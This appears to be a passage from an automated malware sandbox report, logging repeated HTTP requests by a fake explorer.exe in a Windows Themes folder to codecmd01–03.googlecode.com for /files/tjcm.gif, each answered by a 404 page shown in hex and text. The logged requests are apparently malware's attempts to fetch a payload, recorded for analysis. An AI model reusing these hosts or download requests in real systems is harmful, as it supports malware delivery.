                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:46.151468992 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      93192.168.2.54980774.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:46.546003103 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:47.242011070 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:47 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:47.242033005 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      94192.168.2.549808108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:47.585534096 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:48.301758051 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:48 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:48.301826000 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      95192.168.2.549809108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:49.131823063 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:49.807276964 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:49 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:49.807483912 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      96192.168.2.54981074.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:50.298732042 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:50.970822096 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:50 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:50.970854998 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      97192.168.2.549811108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:51.882261992 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:52.987488031 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:52 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:52.987510920 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                      Sep 30, 2024 16:15:52.987520933 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                      Sep 30, 2024 16:15:52.987576008 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:52 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      98192.168.2.549812108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:53.472857952 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:54.139863014 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:54 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
